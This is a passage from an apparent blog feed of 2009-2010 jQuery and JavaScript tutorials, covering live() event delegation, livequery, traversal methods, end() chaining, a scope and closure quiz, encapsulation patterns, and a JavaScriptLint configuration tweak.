  data = jQuery.data(elem, &quot;_change_data&quot;);
  val = getVal(elem);

  if (val === data) {
    return;
  }

  // the current data will be also retrieved by beforeactivate
  if (e.type !== &quot;focusout&quot; || elem.type !== &quot;radio&quot;) {
    jQuery.data(elem, &quot;_change_data&quot;, val);
  }

  if (elem.type !== &quot;select&quot; &amp;&amp; (data != null || val)) {
    e.type = &quot;change&quot;;
    return jQuery.event.trigger(e, arguments[1], this);
  }
}</code></pre><p>Here is <a href="http://github.com/jquery/jquery/commit/d42afd0f657d12d6daba6894d40226bea83fe1b6">the commit</a> that fixed this issue.</p><pre><code class="language-javascript">jQuery.event.special.change = {
  filters: {
    focusout: testChange,

    click: function( e ) {
      var elem = e.target, type = elem.type;
      if ( type === &quot;radio&quot; || type === &quot;checkbox&quot; || elem.nodeName.toLowerCase() === &quot;select&quot; ) {
        return testChange.call( this, e );
      }
    },

    // Change has to be called before submit
    // Keydown will be called before keypress, which is used in submit-event delegation
    keydown: function( e ) {
      var elem = e.target, type = elem.type;
      if ( (e.keyCode === 13 &amp;&amp; elem.nodeName.toLowerCase() !== &quot;textarea&quot;) ||
          (e.keyCode === 32 &amp;&amp; (type === &quot;checkbox&quot; || type === &quot;radio&quot;)) ||
          type === &quot;select-multiple&quot; ) {
        return testChange.call( this, e );
      }
    },

    // Beforeactivate happens also before the previous element is blurred
    // with this event you can't trigger a change event, but you can store
    // information/focus[in] is not needed anymore
    beforeactivate: function( e ) {
      var elem = e.target;
      if ( elem.nodeName.toLowerCase() === &quot;input&quot; &amp;&amp; elem.type === &quot;radio&quot; ) {
        jQuery.data( elem, &quot;_change_data&quot;, getVal(elem) );
      }
    }
  },

  setup: function( data, namespaces, fn ) {
    for ( var type in changeFilters ) {
      jQuery.event.add( this, type + &quot;.specialChange.&quot; + fn.guid, changeFilters[type] );
    }
    return formElems.test( this.nodeName );
  },

  remove: function( namespaces, fn ) {
    for ( var type in changeFilters ) {
      jQuery.event.remove( this, type + &quot;.specialChange&quot; + (fn ? &quot;.&quot;+fn.guid : &quot;&quot;), changeFilters[type] );
    }
    return formElems.test( this.nodeName );
  }
};

var changeFilters = jQuery.event.special.change.filters;</code></pre><h2>Making the submit event bubble</h2><p>In order to detect the submission of a form, one needs to watch for a click event on a submit button or an image button. Additionally, one can hit 'enter' on the keyboard to submit the form. All of these need to be tracked.</p><pre><code class="language-javascript">jQuery.event.special.submit = {
  setup: function (data, namespaces, fn) {
    if (this.nodeName.toLowerCase() !== &quot;form&quot;) {
      jQuery.event.add(this, &quot;click.specialSubmit.&quot; + fn.guid, function (e) {
        var elem = e.target,
          type = elem.type;
        if (
          (type === &quot;submit&quot; || type === &quot;image&quot;) &amp;&amp;
          jQuery(elem).closest(&quot;form&quot;).length
        ) {
          return trigger(&quot;submit&quot;, this, arguments);
        }
      });

      jQuery.event.add(this, &quot;keypress.specialSubmit.&quot; + fn.guid, function (e) {
        var elem = e.target,
          type = elem.type;
        if (
          (type === &quot;text&quot; || type === &quot;password&quot;) &amp;&amp;
          jQuery(elem).closest(&quot;form&quot;).length &amp;&amp;
          e.keyCode === 13
        ) {
          return trigger(&quot;submit&quot;, this, arguments);
        }
      });
    }
  },

  remove: function (namespaces, fn) {
    jQuery.event.remove(
      this,
      &quot;click.specialSubmit&quot; + (fn ? &quot;.&quot; + fn.guid : &quot;&quot;)
    );
    jQuery.event.remove(
      this,
      &quot;keypress.specialSubmit&quot; + (fn ? &quot;.&quot; + fn.guid : &quot;&quot;)
    );
  },
};</code></pre><p>As you can see, if a submit button or an image button is clicked inside a form, the submit event is triggered. Additionally, the keypress event is monitored, and if the <a href="http://www.cambiaresearch.com/c4/702b8cd1-e5b0-42e6-83ac-25f0306e3e25/Javascript-Char-Codes-Key-Codes.aspx">keyCode</a> is 13 then the form is submitted.</p><p>The live method is just pure awesome. It is great to see the last few wrinkles getting sorted out. A big <code>Thank You</code> to Justin Meyer of <a href="http://javascriptmvc.com">JavaScriptMVC</a>, who submitted most of the patch for fixing this vexing issue.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Calling a method on a jQuery collection]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/hidden-feature-of-jquery-calling-a-method-on-a-jquery-collection"/>
      <updated>2010-01-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/hidden-feature-of-jquery-calling-a-method-on-a-jquery-collection</id>
      <content type="html"><![CDATA[<p>I was going through <a href="http://jqueryfordesigners.com/adding-keyboard-navigation">Adding keyboard navigation</a> and noticed that Remi replaced this code</p><pre><code class="language-javascript">$(&quot;.coda-slider-wrapper ul a.current&quot;).parent().next().find(&quot;a&quot;).click();</code></pre><p>with this code</p><pre><code class="language-javascript">var direction = &quot;next&quot;;
$(&quot;.coda-slider-wrapper ul a.current&quot;).parent()[direction]().find(&quot;a&quot;).click();</code></pre><p>I had never seen anything like that. In the above-mentioned article, Remi used the <code>next</code> and <code>prev</code> methods. However, I wanted to know all the options I could pass, since this feature is not well documented.</p><h2>Snippet from jQuery source code</h2><p>Here is the code from jQuery that makes the above work.</p><pre><code class="language-javascript">jQuery.each(
  {
    parent: function (elem) {
      return elem.parentNode;
    },
    parents: function (elem) {
      return jQuery.dir(elem, &quot;parentNode&quot;);
    },
    next: function (elem) {
      return jQuery.nth(elem, 2, &quot;nextSibling&quot;);
    },
    prev: function (elem) {
      return jQuery.nth(elem, 2, &quot;previousSibling&quot;);
    },
    nextAll: function (elem) {
      return jQuery.dir(elem, &quot;nextSibling&quot;);
    },
    prevAll: function (elem) {
      return jQuery.dir(elem, &quot;previousSibling&quot;);
    },
    siblings: function (elem) {
      return jQuery.sibling(elem.parentNode.firstChild, elem);
    },
    children: function (elem) {
      return jQuery.sibling(elem.firstChild);
    },
    contents: function (elem) {
      return jQuery.nodeName(elem, &quot;iframe&quot;)
        ? elem.contentDocument || elem.contentWindow.document
        : jQuery.makeArray(elem.childNodes);
    },
  },
  function (name, fn) {
    jQuery.fn[name] = function (selector) {
      var ret = jQuery.map(this, fn);
      if (selector &amp;&amp; typeof selector == &quot;string&quot;)
        ret = jQuery.multiFilter(selector, ret);
      return this.pushStack(jQuery.unique(ret), name, selector);
    };
  });</code></pre><p>As you can see, each of these traversal names becomes a method on the jQuery object, so any of them can be used with the bracket notation jQueryCollection[name]().</p><p>If you want to give it a try, any jQuery-enabled site should run all of the code below without any problem.</p><pre><code class="language-javascript">var a = $(&quot;a:first&quot;);
var log = console.log;

log(a[&quot;parent&quot;]());
log(a[&quot;parents&quot;]());
log(a[&quot;next&quot;]());
log(a[&quot;prev&quot;]());
log(a[&quot;nextAll&quot;]());
log(a[&quot;prevAll&quot;]());
log(a[&quot;siblings&quot;]());
log(a[&quot;children&quot;]());
log(a[&quot;contents&quot;]());</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Use end more often in jQuery while building DOM elements]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/use-end-more-often-in-jquery-while-building-dom-elements"/>
      <updated>2009-11-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-end-more-often-in-jquery-while-building-dom-elements</id>
      <content type="html"><![CDATA[<p>I want to create following markup dynamically using jQuery.</p><pre><code class="language-html">&lt;div&gt;  &lt;p&gt;This is p&lt;/p&gt;&lt;/div&gt;</code></pre><p>Following jQuery code will do the work.</p><pre><code class="language-javascript">$(document).ready(function () {  var div = $(&quot;&lt;div&gt;&lt;/div&gt;&quot;);  var p = $(&quot;&lt;p&gt;&lt;/p&gt;&quot;).text(&quot;this is p&quot;).appendTo(div);  $(&quot;body&quot;).append(div);});</code></pre><p>A better way to accomplish the same is presented below.</p><pre><code class="language-javascript">$(&quot;&lt;div&gt;&lt;/div&gt;&quot;)  .append(&quot;&lt;p&gt;&lt;/p&gt;&quot;)  .find(&quot;p&quot;)  .text(&quot;this is p&quot;)  .end()  .appendTo(&quot;body&quot;);</code></pre><p>Using <code>.end()</code> you can go back one level. And you can use <code>.end()</code> any number oftimes to get out of a deeply nested tag.</p><pre><code class="language-javascript">$(&quot;&lt;div&gt;&lt;/div&gt;&quot;)  .append(&quot;&lt;p&gt;&lt;/p&gt;&quot;)  .find(&quot;p&quot;)  .append(&quot;&lt;span&gt;&lt;/span&gt;&quot;)  .find(&quot;span&quot;)  .text(&quot;this is span&quot;)  .end()  .end()  .appendTo(&quot;body&quot;);</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[JavaScript Basics Quiz]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/javascript-basics-quiz"/>
      <updated>2009-10-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/javascript-basics-quiz</id>
<content type="html"><![CDATA[<p>Let's look at some JavaScript questions.</p><h2>Question 1</h2><p>What's the output?</p><pre><code class="language-javascript">x = 90;
function f() {
  console.log(x);
  var x = 100;
}
f();</code></pre><h2>Answer 1</h2><p>The result is <code>undefined</code>. In JavaScript a variable exists in the scope of a function, and that variable can be declared anywhere in the function: the declaration of <code>x</code> is hoisted to the top of <code>f</code>, so the local <code>x</code> shadows the global one but has no value yet when it is logged. To find out more about lexical scope read <a href="http://stackoverflow.com/questions/1047454/what-is-lexical-scope">here</a> and <a href="http://en.wikipedia.org/wiki/Scope_(programming)">here</a>.</p><h2>Question 2</h2><p>Go to the <a href="http://www.prototypejs.org">prototype homepage</a>, open Firebug and execute the following code.</p><pre><code class="language-javascript">var a = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;];
var result = &quot;\n&quot;;
for (i in a) {
  result += &quot;index: &quot; + i + &quot; value:&quot; + a[i] + &quot;\n&quot;;
}</code></pre><p>Now go to the <a href="http://jquery.com">jQuery</a> homepage and execute the same code. Notice the difference in output. Why the difference?</p><h2>Answer 2</h2><p>Prototype adds additional methods to Array using <code>Array.prototype</code>. Those methods show up when you iterate through the array with <code>for...in</code>. 
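</p><p>The effect described above can be reproduced without any library. The sketch below is my own illustration (the name <code>demoMethod</code> is made up): extending <code>Array.prototype</code> the way Prototype does makes the new key show up in a <code>for...in</code> loop, while a <code>hasOwnProperty</code> guard filters it out.</p>

```javascript
// Simulate what Prototype.js does: add a method to Array.prototype.
Array.prototype.demoMethod = function () {};

var a = ["a", "b", "c"];

var keys = [];
for (var i in a) {
  keys.push(i); // collects "0", "1", "2" and also "demoMethod"
}

var ownKeys = [];
for (var j in a) {
  if (a.hasOwnProperty(j)) ownKeys.push(j); // only "0", "1", "2"
}

delete Array.prototype.demoMethod; // clean up after the demo
```

<p>On the Prototype homepage the extra keys you see are the library's own Array extensions.</p><p>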
If you want to ignore methods added through <code>Array.prototype</code> then use this code.</p><pre><code class="language-javascript">var a = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;];
var result = &quot;\n&quot;;
for (i in a) {
  if (a.hasOwnProperty(i)) result += &quot;index: &quot; + i + &quot; value:&quot; + a[i] + &quot;\n&quot;;
}</code></pre><h2>Question 3</h2><p>In order to find if an element with id <code>foo</code> is present, one can do</p><pre><code class="language-javascript">if ($(&quot;#foo&quot;).length &gt; 0) console.log(&quot;id foo is present&quot;);</code></pre><p>How can you make the conditional statement shorter?</p><h2>Answer 3</h2><p>In JavaScript the following values evaluate to false in a conditional statement: undefined, null, false, the empty string, NaN and 0. Note that a jQuery object itself is always truthy, but its <code>length</code> is 0 when nothing matched, so the explicit comparison can be dropped.</p><pre><code class="language-javascript">if ($(&quot;#foo&quot;).length) console.log(&quot;id foo is present&quot;);</code></pre><h2>Question 4</h2><p>What is the output in this case? Notice that function bar is defined after the <code>return</code> statement.</p><pre><code class="language-javascript">function foo() {
  console.log(z);
  console.log(bar());
  return true;
  function bar() {
    return &quot;this is bar&quot;;
  }
  var z = &quot;zzz&quot;;
}
foo();</code></pre><h2>Answer 4</h2><p>Output is</p><pre><code class="language-plaintext">undefined
this is bar
true</code></pre><h2>Question 5</h2><p>What's the output in this case?</p><pre><code class="language-javascript">function logit(n) {
  console.log(n);
}
for (i = 1; i &lt; 5; i++) {
  setInterval(function () {
    logit(i);
  }, 2000);
}</code></pre><h2>Answer 5</h2><p>The result would be the output <code>5 5 5 5</code>, and all four values will appear together in one shot. Then after 2 seconds another set of the same output would appear. This would continue forever.</p><p>The question is why the output appears in one single shot, and why the value is 5 in all four cases.</p><p>Browsers execute JavaScript in a single thread. 
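</p><p>One part of this answer (why every callback sees the value 5) can be reproduced deterministically, without timers. This is my own minimal sketch: each function created in the loop closes over the same variable <code>i</code>, so all of them read its final value.</p>

```javascript
var callbacks = [];
for (var i = 1; i < 5; i++) {
  callbacks.push(function () {
    return i; // i is read when the function runs, not when it is created
  });
}

// The loop has finished, so i is 5 for every callback.
var results = [];
for (var k = 0; k < callbacks.length; k++) {
  results.push(callbacks[k]());
}
// results is [5, 5, 5, 5], mirroring the "5 5 5 5" printed by setInterval
```

<p>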
While that thread is busy executing the for loop, it makes a note of additional instructions like the setInterval callbacks. Since the thread is already running the for loop, it cannot run the callbacks at the same time. So the thread finishes the for loop and then looks for additional tasks to be performed. It finds the setInterval callbacks waiting and executes them. At that point, by virtue of closure, the value of i is 5. Hence you see <code>5 5 5 5</code>, and you see all of it in one single shot.</p><p>A correct implementation would be</p><pre><code class="language-javascript">function logit(n) {
  console.log(n);
}
var counter = 0;
var timer = setInterval(function () {
  logit(counter);
  counter++;
  if (counter == 5) {
    clearInterval(timer);
  }
}, 2000);</code></pre><p>The above code would print <code>0 1 2 3 4</code> at an interval of 2 seconds.</p><h2>Question 6</h2><p>What's the output in this case?</p><pre><code class="language-javascript">flight = { status: &quot;arrived&quot; };
console.log(typeof flight.status);
console.log(typeof flight.toString);
console.log(flight.hasOwnProperty(&quot;status&quot;));
console.log(flight.hasOwnProperty(&quot;toString&quot;));</code></pre><h2>Answer 6</h2><pre><code class="language-plaintext">string
function
true
false</code></pre><h2>Question 7</h2><p>What's the output in this case?</p><pre><code class="language-javascript">function Person(name) {
  this.name = name;
}
Person.prototype.welcome = function () {
  return &quot;welcome &quot; + this.name;
};
p = new Person(&quot;John&quot;);
console.log(p.welcome.call(p));
o = { name: &quot;Mary&quot; };
console.log(Person.prototype.welcome.call(o));</code></pre><h2>Answer 7</h2><pre><code class="language-plaintext">welcome John
welcome Mary</code></pre><h2>Question 8</h2><p>JavaScript has a <code>Math</code> library which can be used like this</p><pre><code class="language-javascript">Math.max(6, 7, 8); // result is 8</code></pre><p>If I provide an array with certain values then how would you find the max 
value for that array?</p><pre><code class="language-javascript">a = [1, 2, 3];</code></pre><h2>Answer 8</h2><p>This answer builds on the answer to question 7.</p><p>You can try this, but it will fail.</p><pre><code class="language-javascript">Math.max(a); // output is NaN</code></pre><p>You can try this, but it will fail too.</p><pre><code class="language-javascript">Math.max.call(Math, a); // output is NaN</code></pre><p>This will work</p><pre><code class="language-javascript">Math.max.apply(Math, a); // output is 3</code></pre><p>The <code>apply</code> method works because it accepts an array and spreads it out as individual arguments. The <code>call</code> method passes its parameters to the called method as-is, so the array arrives as a single argument, and hence it does not work. You can read more about JavaScript <a href="http://odetocode.com/blogs/scott/archive/2007/07/04/function-apply-and-function-call-in-javascript.aspx">apply and call methods here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[livequery in jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-live-method-works-in-jquery-why-it-does-not-work-in-some-cases-when-to-use-livequery"/>
      <updated>2009-10-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-live-method-works-in-jquery-why-it-does-not-work-in-some-cases-when-to-use-livequery</id>
<content type="html"><![CDATA[<p><em>Following code has been tested with jQuery 1.3.2.</em></p><p>All the JavaScript code mentioned in this blog should be tried in Firebug.</p><p>The super popular <a href="http://docs.jquery.com/Events/live">live method</a> was added to jQuery 1.3. It works just great. Except when it does not work. As per the documentation this method does not work for the following events: blur, focus, mouseenter, mouseleave, change, submit.</p><h2>How binding events work in jQuery</h2><pre><code class="language-javascript">$(&quot;a&quot;).click(function () {
  console.log(&quot;clicked&quot;);
});</code></pre><p>In the above case the <code>click</code> event is bound to all the links in the <code>document</code>. jQuery stores such binding information in the <code>data</code> attribute of the bound element. This is how I can access the list of all functions bound to an element.</p><pre><code class="language-javascript">$(&quot;a&quot;).data(&quot;events&quot;); // Object click=Object</code></pre><p>If a new link is dynamically added then that new link will not get this click behavior. To solve this problem I can use the live method.</p><h2>Trying out the live event</h2><pre><code class="language-javascript">$(&quot;a&quot;).live(&quot;click&quot;, function () {
  console.log(&quot;clicked&quot;);
});</code></pre><p>If I add a new <code>a</code> tag dynamically then that tag will automatically get the click behavior. That's great.</p><p>Just like the previous section, now I am going to find the events bound to the <code>a</code> element. However when I execute the following code I get <code>undefined</code>.</p><pre><code class="language-javascript">$(&quot;a&quot;).data(&quot;events&quot;); // undefined</code></pre><p>Why is that? In the previous section I showed that all the events bound to an element are stored in the data attribute of that element. Well, live is different. live events are not bound to the element directly. They are bound to the top level <code>document</code>. 
I can verify this by trying out this code</p><pre><code class="language-javascript">jQuery.data(document, &quot;events&quot;).live; // Object</code></pre><h2>How does the live method work</h2><p>live methods do not set anything on elements directly. All the event handlers are set at the document level. It means that in order for live methods to work, event bubbling is required. If you don't know what event bubbling is then <a href="http://www.quirksmode.org/js/events_order.html">read here</a>. It also means that the event should not be stopped while it is propagating to document. If event propagation is stopped then event handlers bound at the document level will never know about that event and the live method will fail.</p><p>The strategy of letting someone else deal with the event is called <code>event delegation</code>.</p><p>When the live method is called then a binding is done at the document level. Loosely translated, this is what is basically happening.</p><pre><code class="language-javascript">$(document).bind(&quot;click&quot;, function (event) {
  var $target = $(event.target);
  if ($target.is(&quot;p&quot;)) {
    console.log(&quot;p was clicked&quot;);
  }
});</code></pre><p>As you can see, when a click on <code>p</code> bubbles all the way to the top then that event is captured by document, and the necessary action is taken if the target element matches.</p><p>It is clear that if the click event is stopped before it reaches document then the live method will not work. I will show you an example.</p><pre><code class="language-html">&lt;div id=&quot;parent&quot;&gt;
  Languages
  &lt;p&gt;Java&lt;/p&gt;
  &lt;p&gt;Javascript&lt;/p&gt;
&lt;/div&gt;</code></pre><pre><code class="language-javascript">$(&quot;p&quot;).live(&quot;click&quot;, function (e) {
  console.log(&quot;p was clicked&quot;);
});</code></pre><p>If I click on <code>Java</code> or <code>Javascript</code> I get a message on the console. live is working great. 
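</p><p>The document-level dispatch that live relies on can be sketched without a browser. Below is a toy model written for this post (the <code>bubble</code> helper and the node objects are made up, not jQuery or DOM APIs): a single handler on the 'document' inspects <code>event.target</code>, and stopping propagation below it hides the event from that handler.</p>

```javascript
// Toy model of event bubbling (not real DOM): an event visits each node
// from the target up to the "document"; any node may stop propagation.
function bubble(chain, event) {
  for (var i = 0; i < chain.length; i++) {
    if (chain[i].handler) chain[i].handler(event);
    if (event.stopped) break; // a node did the equivalent of stopPropagation()
  }
}

var log = [];
var p = { name: "p" };
var doc = {
  name: "document",
  handler: function (event) {
    // delegation: the top-level handler checks who the target was
    if (event.target.name === "p") log.push("p was clicked");
  },
};

// Normal case: the event bubbles from p up to doc, and doc's handler fires.
bubble([p, doc], { target: p, stopped: false });
// log is now ["p was clicked"]

// If an intermediate element stops propagation, doc never sees the event.
var div = {
  name: "div",
  handler: function (event) {
    event.stopped = true;
  },
};
bubble([p, div, doc], { target: p, stopped: false });
// log is unchanged: delegation fails once bubbling is stopped
```

<p>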
Now I'll stop the event propagation when the event reaches the div.</p><pre><code class="language-javascript">$(&quot;p&quot;).live(&quot;click&quot;, function (e) {
  console.log(&quot;p was clicked&quot;);
});
$(&quot;#parent&quot;).click(function (e) {
  console.log(&quot;stopping propagation&quot;);
  e.stopPropagation();
});</code></pre><p>Now you will notice that live is no longer working.</p><h2>live does not work when event bubbling is not supported</h2><p>In the previous section I showed that when an event does not bubble up to document then live fails. It means that live will not work for any event that does not bubble. Which means that events like blur, focus, mouseenter, mouseleave, change and submit, which do not bubble in IE, will not work with live in IE. However, note that these events will continue to work in Firefox.</p><pre><code class="language-html">&lt;select id=&quot;lab1a&quot; name=&quot;sweets&quot; multiple=&quot;multiple&quot;&gt;
  &lt;option&gt;Chocolate&lt;/option&gt;
  &lt;option selected=&quot;selected&quot;&gt;Candy&lt;/option&gt;
  &lt;option&gt;Taffy&lt;/option&gt;
  &lt;option selected=&quot;selected&quot;&gt;Caramel&lt;/option&gt;
  &lt;option&gt;Fudge&lt;/option&gt;
  &lt;option&gt;Cookie&lt;/option&gt;
&lt;/select&gt;
&lt;div id=&quot;lab1b&quot; style=&quot;color:red;&quot;&gt;&lt;/div&gt;</code></pre><pre><code class="language-javascript">$(&quot;#lab1a&quot;).live(&quot;change&quot;, function () {
  var str = &quot;&quot;;
  $(&quot;select option:selected&quot;).each(function () {
    str += $(this).text() + &quot; &quot;;
  });
  $(&quot;#lab1b&quot;).text(str);
});</code></pre><p>The above code will work in Firefox but it will not work in IE.</p><p>The onchange event is an example of such an event.</p><p>DOM models suggest that the <a href="http://msdn.microsoft.com/en-us/library/ms536912%28VS.85%29.aspx">onchange event should bubble</a>. 
However the msdn documentation clearly says that the <a href="http://msdn.microsoft.com/en-us/library/ms536912%28VS.85%29.aspx">onchange event does not bubble</a>.</p><h2>Make all the live method problems go away</h2><p>To recap, the live method will not work in the following cases:</p><ul><li>live works through event propagation; if an event is stopped while it is bubbling then live will not work.</li><li>IE does not support bubbling for certain events; live on those events will not work in IE.</li></ul><p>There is a way to get around both problems.</p><p><a href="http://brandonaaron.net/code">Brandon Aaron</a> developed the <a href="http://docs.jquery.com/Plugins/livequery">livequery plugin</a>, which was eventually merged into jQuery as the live method. The livequery plugin solves both the problems listed above, and the code works in IE too.</p><p>The first step is to include the plugin.</p><pre><code class="language-html">&lt;script
  src=&quot;http://github.com/brandonaaron/livequery/raw/master/jquery.livequery.js&quot;
  type=&quot;text/javascript&quot;&gt;&lt;/script&gt;</code></pre><p>Now try this code.</p><pre><code class="language-javascript">$(&quot;p&quot;).livequery(&quot;click&quot;, function (e) {
  alert(&quot;p was clicked&quot;);
});
$(&quot;#parent&quot;).click(function (e) {
  alert(&quot;stopping propagation&quot;);
  e.stopPropagation();
});
$(&quot;#lab1a&quot;).livequery(&quot;change&quot;, function () {
  var str = &quot;&quot;;
  $(&quot;select option:selected&quot;).each(function () {
    str += $(this).text() + &quot; &quot;;
  });
  $(&quot;#lab1b&quot;).text(str);
});</code></pre><pre><code class="language-html">&lt;select id=&quot;lab1a&quot; name=&quot;sweets&quot; multiple=&quot;multiple&quot;&gt;
  &lt;option&gt;Chocolate&lt;/option&gt;
  &lt;option selected=&quot;selected&quot;&gt;Candy&lt;/option&gt;
  &lt;option&gt;Taffy&lt;/option&gt;
  &lt;option selected=&quot;selected&quot;&gt;Caramel&lt;/option&gt;
  &lt;option&gt;Fudge&lt;/option&gt;
  &lt;option&gt;Cookie&lt;/option&gt;
&lt;/select&gt;
&lt;div id=&quot;lab1b&quot; style=&quot;color:red;&quot;&gt;&lt;/div&gt;
&lt;div id=&quot;parent&quot;&gt;
  Languages
  &lt;p&gt;Java&lt;/p&gt;
  &lt;p&gt;Javascript&lt;/p&gt;
&lt;/div&gt;</code></pre><p>If I click on 'Java' or 'Javascript' I will get a proper response even though event propagation is being stopped. Also, even though the change event does not bubble in IE, the above code works in IE.</p><p>livequery works because, unlike live, it does not do its binding at the document level. livequery binds at the element level. You can find that out by running the following code.</p><pre><code class="language-javascript">$(&quot;p&quot;).data(&quot;events&quot;);</code></pre><p>The above code will produce a result if I am using livequery. It will not produce any result if I am using the live method.</p><p>The key piece of code in the plugin that makes all this work is</p><pre><code class="language-javascript">// Create a timeout to check the queue and actually run the Live Queries
$.livequery.timeout = setTimeout($.livequery.checkQueue, 20);</code></pre><p>Every 20 milliseconds livequery checks all the bindings defined through livequery and binds any newly matched elements to the event.</p><p>By understanding the internals of how live and livequery are implemented, you can choose livequery in the cases where live will not work. It also helps to understand how live actually works.</p><h2>Live method finds elements and then throws them away. Not very efficient.</h2><p>A typical use of the live method is something like this.</p><pre><code class="language-javascript">$(&quot;p&quot;).live(&quot;click&quot;, function (e) {
  console.log(&quot;p was clicked&quot;);
});</code></pre><p>As has already been discussed, the live method registers events at the document level.</p><p>However when <code>$('p').live(...)</code> is evaluated, jQuery first goes and finds all the <code>p</code> elements. 
And then what does it do with those elements? Nothing. That's right. jQuery throws away all those <code>p</code> elements which were just found, without using them. What a waste.</p><p>If your application has a lot of live methods, this might slow down the performance of the application.</p><p>A better solution would have been to design an API like this one:</p><pre><code class="language-javascript">$.live('p', 'click', function(){..});</code></pre><p>jQuery is flexible and I can create my own live method, but it will add to the confusion. Another solution would be to call the live method without first finding all those <code>p</code> elements. Here is how it can be done.</p><pre><code class="language-javascript">var myDocument = $(document);
myDocument.selector = 'p';
myDocument.live('click', function(){
  console.log('p was clicked');
});</code></pre><p>In the above case no element will be selected only to be thrown away. This is much better.</p><h2>Seeing is believing</h2><p>In the previous section, I showed how the live method can be made to work without first selecting the elements. However, a friend of mine asked me if I could conclusively prove that in the real live method a find is <em>actually</em> done, and that in my solution a find call is <em>not</em> done.</p><p>Here I am overriding the original <em>find</em> method. I log a message before handing over to the original method.</p><pre><code class="language-javascript">(function () {
  var originalFindMethod = jQuery.fn.find;
  jQuery.fn.find = function () {
    console.log(&quot;find was called&quot;);
    return originalFindMethod.apply(this, arguments);
  };
})();
$(document).ready(function () {
  $(&quot;p&quot;).live(&quot;click&quot;, function () {
    console.log(&quot;p was clicked&quot;);
  });
});</code></pre><p>In the above case you will get a message on the Firebug console confirming that find is indeed invoked when the live method is called.</p><p>Here is the revised version of live. 
Try this one.</p><pre><code class="language-javascript">(function () {
  var originalFindMethod = jQuery.fn.find;
  jQuery.fn.find = function () {
    console.log(&quot;find was called&quot;);
    return originalFindMethod.apply(this, arguments);
  };
})();
$(document).ready(function () {
  var myDocument = $(document);
  myDocument.selector = &quot;p&quot;;
  myDocument.live(&quot;click&quot;, function () {
    console.log(&quot;p was clicked&quot;);
  });
});</code></pre><p>The above version does not print 'find was called'.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Encapsulation in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/encapsulation-in-javascript"/>
      <updated>2009-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/encapsulation-in-javascript</id>
<content type="html"><![CDATA[<p>JavaScript does not allow you to declare a method as public or private. This is a limitation developers need to work around, because in real life you don't want to expose every method as public.</p><p>Here is a simple implementation of a case where you want to verify an input code.</p><pre><code class="language-javascript">function verifycode(code) {
  console.log(code.length);
  return code.length == 4 ? true : false;
}
function info(code) {
  if (verifycode(code)) {
    console.log(code + &quot; is valid&quot;);
  } else {
    console.log(code + &quot; is wrong&quot;);
  }
}
info(&quot;abcd&quot;);
info(&quot;rty&quot;);</code></pre><p>In the above implementation anyone can call the method verifycode. Not good. Here is one way to fix this problem.</p><pre><code class="language-javascript">var Lab = Lab || {};
Lab = (function () {
  var verifycode = function (code) {
    console.log(code.length);
    return code.length == 4 ? true : false;
  };
  return {
    info: function (code) {
      if (verifycode(code)) {
        console.log(code + &quot; is valid&quot;);
      } else {
        console.log(code + &quot; is wrong&quot;);
      }
    },
  };
})();
Lab.info(&quot;abcd&quot;);
Lab.info(&quot;rty&quot;);
Lab.verifycode(&quot;abcd&quot;); // fails: verifycode is private</code></pre><p>Another way to solve the same problem would be to create a constructor function. Here is an implementation.</p><pre><code class="language-javascript">function Lab(code) {
  this.code = code;
  var verifycode = function () {
    return code.length == 4 ? true : false;
  };
  this.info = function () {
    if (verifycode()) {
      console.log(code + &quot; is valid&quot;);
    } else {
      console.log(code + &quot; is wrong&quot;);
    }
  };
}
new Lab(&quot;abcd&quot;).info();</code></pre><p>Here is another way to solve the same problem. 
In this case I have moved the public method to the prototype.</p><pre><code class="language-javascript">function Lab(code) {
  this.code = code;
  this.verifycode = function () {
    var l = code.length;
    return l == 4 ? true : false;
  };
}
Lab.prototype.info = function () {
  if (this.verifycode()) {
    console.log(this.code + &quot; is valid&quot;);
  } else {
    console.log(this.code + &quot; is wrong&quot;);
  }
};
new Lab(&quot;abcd&quot;).info();</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Integrating JavaScriptLint with mvim]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/integrating-javascriptlint-with-mvim-and-getting-rid-of-annoying-warnings"/>
      <updated>2009-09-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/integrating-javascriptlint-with-mvim-and-getting-rid-of-annoying-warnings</id>
<content type="html"><![CDATA[<p>I use <a href="http://www.javascriptlint.com">JavaScriptLint</a> along with <a href="http://www.vim.org/scripts/script.php?script_id=2578">JavaScriptLint.vim</a> on mvim to catch JavaScript syntax errors and missing semicolons. It works great, except when I am chaining methods like this.</p><pre><code class="language-javascript">var select_col1 = $(&quot;&lt;select&gt;&lt;/select&gt;&quot;)
  .addClass(&quot;ram_drop_down&quot;)
  .addClass(&quot;ram_drop_down_col1&quot;)
  .attr(&quot;name&quot;, &quot;adv_search[&quot; + random_num + &quot;_row][col1]&quot;)
  .attr(&quot;id&quot;, random_num + &quot;_ram_drop_down_col1&quot;);</code></pre><p>In such cases JavaScriptLint had warnings for me.</p><pre><code class="language-plaintext">unexpected end of line. It is ambiguous whether these lines are part of the same statement.</code></pre><p>JavaScriptLint wants me to put the dot at the end of the line and not at the beginning of the next line. Well, I like having dots at the beginning of lines, and I wanted to turn off that warning.</p><p>JavaScriptLint comes with a default config file. I copied the config file to a personal directory and disabled the warning.</p><pre><code class="language-plaintext">before: +ambiguous_newline
